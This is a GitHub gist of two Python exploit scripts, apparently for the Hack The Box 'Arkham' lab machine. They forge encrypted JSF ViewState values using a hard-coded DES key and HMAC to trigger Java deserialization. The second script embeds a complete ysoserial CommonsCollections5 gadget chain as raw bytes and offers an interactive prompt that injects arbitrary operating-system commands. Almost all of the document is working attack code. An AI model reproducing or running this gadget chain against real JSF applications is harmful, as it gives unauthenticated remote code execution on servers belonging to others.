Skip to content

Instantly share code, notes, and snippets.

@kkirsche

kkirsche/arkham-week1.py

Last active October 1, 2019 14:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kkirsche/8b32d3b85e0c4c9e1d4b503d82a7547b to your computer and use it in GitHub Desktop.
Save kkirsche/8b32d3b85e0c4c9e1d4b503d82a7547b to your computer and use it in GitHub Desktop.
Download ZIP
Arkham Walkthrough
Raw
arkham-week1.py
#!/usr/bin/env python3
from requests import post
from base64 import b64encode, b64decode
from hashlib import sha1
from pyDes import des, ECB, PAD_PKCS5
import hmac
def create_payload():
payload = ""
with open("payload.bin", "rb") as f:
payload = f.read()
if payload == "":
raise ValueError("Payload should not be empty!")
return encrypt_payload(payload)
def encrypt_payload(payload):
key = b64decode("SnNGOTg3Ni0=")
crypter = des(key, ECB, padmode=PAD_PKCS5)
encrypted = crypter.encrypt(payload)
hmac_hash = hmac.new(key, bytes(encrypted), sha1).digest()
payload = encrypted + hmac_hash
return b64encode(payload)
def exploit_arkham():
url = "http://10.10.10.130:8080/userSubscribe.faces"
view_state = create_payload()
data = {'javax.faces.ViewState': view_state}
resp = post(url, data=data)
print(resp.text)
if __name__ == "__main__":
exploit_arkham()
Raw
arkham-week2.py
#!/usr/bin/env python3
from requests import post
from base64 import b64encode, b64decode
from hashlib import sha1
import pyDes
import hmac
def create_payload(cmd):
payload = b''
payload += b'\xac\xed\x00\x05\x73\x72\x00\x2e\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x42\x61\x64\x41\x74'
payload += b'\x74\x72\x69\x62\x75\x74\x65\x56\x61\x6c\x75\x65\x45\x78\x70\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd4\xe7\xda\xab\x63\x2d'
payload += b'\x46\x40\x02\x00\x01\x4c\x00\x03\x76\x61\x6c\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63'
payload += b'\x74\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a'
payload += b'\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5'
payload += b'\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e'
payload += b'\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x74\x00'
payload += b'\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61'
payload += b'\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65'
payload += b'\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00'
payload += b'\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x08\x70\x75\x72\x00\x1e\x5b'
payload += b'\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02'
payload += b'\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x03\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e'
payload += b'\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x08\x42\x00'
payload += b'\x06\x66\x6f\x72\x6d\x61\x74\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0f\x63\x6c\x61\x73\x73\x4c\x6f'
payload += b'\x61\x64\x65\x72\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73'
payload += b'\x71\x00\x7e\x00\x05\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64'
payload += b'\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x6f\x64\x75\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0d'
payload += b'\x6d\x6f\x64\x75\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x01\x00\x00\x00\x51\x74\x00\x03\x61\x70'
payload += b'\x70\x74\x00\x26\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x70\x61\x79\x6c\x6f\x61\x64\x73\x2e\x43\x6f\x6d\x6d\x6f\x6e\x73'
payload += b'\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x35\x74\x00\x18\x43\x6f\x6d\x6d\x6f\x6e\x73\x43\x6f\x6c\x6c\x65\x63\x74\x69'
payload += b'\x6f\x6e\x73\x35\x2e\x6a\x61\x76\x61\x74\x00\x09\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x70\x70\x73\x71\x00\x7e\x00\x0b\x01'
payload += b'\x00\x00\x00\x33\x71\x00\x7e\x00\x0d\x71\x00\x7e\x00\x0e\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x10\x70\x70\x73\x71\x00\x7e'
payload += b'\x00\x0b\x01\x00\x00\x00\x22\x71\x00\x7e\x00\x0d\x74\x00\x19\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x47\x65\x6e\x65\x72'
payload += b'\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x74\x00\x14\x47\x65\x6e\x65\x72\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x2e\x6a'
payload += b'\x61\x76\x61\x74\x00\x04\x6d\x61\x69\x6e\x70\x70\x73\x72\x00\x1f\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c'
payload += b'\x65\x63\x74\x69\x6f\x6e\x73\x24\x45\x6d\x70\x74\x79\x4c\x69\x73\x74\x7a\xb8\x17\xb4\x3c\xa7\x9e\xde\x02\x00\x00\x78\x70'
payload += b'\x78\x73\x72\x00\x34\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63'
payload += b'\x74\x69\x6f\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79\x8a\xad\xd2'
payload += b'\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c\x00\x03\x6b\x65\x79\x71\x00\x7e\x00\x01\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c\x6a'
payload += b'\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61'
payload += b'\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e'
payload += b'\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00'
payload += b'\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f'
payload += b'\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68'
payload += b'\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73'
payload += b'\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01'
payload += b'\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68'
payload += b'\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72'
payload += b'\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73'
payload += b'\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8'
payload += b'\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d'
payload += b'\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73'
payload += b'\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69'
payload += b'\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e\x00\x01\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52'
payload += b'\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61'
payload += b'\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f'
payload += b'\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02'
payload += b'\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63'
payload += b'\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d'
payload += b'\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72'
payload += b'\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02'
payload += b'\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76'
payload += b'\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00'
payload += b'\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61'
payload += b'\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00'
payload += b'\x2f\x73\x71\x00\x7e\x00\x28\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x00\x74\x00'
payload += b'\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67'
payload += b'\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x2c\x73\x71\x00\x7e'
payload += b'\x00\x28\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9'
payload += b'\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00'
#payload += b'\x1c\x63\x6d\x64\x20\x2f\x63\x20\x70\x69\x6e\x67\x20\x2d\x6e\x20'
#payload += b'\x32\x20\x31\x30\x2e\x31\x30\x2e\x31\x34\x2e\x33\x37'
payload += (chr(len(cmd)).encode())
payload += cmd.encode()
payload += b'\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x01'
payload += b'\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x24\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67'
payload += b'\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e'
payload += b'\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72'
payload += b'\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02'
payload += b'\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00'
payload += b'\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78'
if payload == "":
raise ValueError("Payload should not be empty!")
return encrypt_payload(payload)
def encrypt_payload(payload):
key = b64decode("SnNGOTg3Ni0=")
obj = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
encrypted = obj.encrypt(payload)
hmac_hash = hmac.new(key, bytes(encrypted), sha1).digest()
payload = encrypted + hmac_hash
return b64encode(payload)
def exploit_arkham(cmd):
url = "http://10.10.10.130:8080/userSubscribe.faces"
view_state = create_payload(cmd)
data = { 'javax.faces.ViewState': view_state }
resp = post(url, data=data)
if __name__ == "__main__":
while True:
cmd = input("=> ")
exploit_arkham(cmd)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment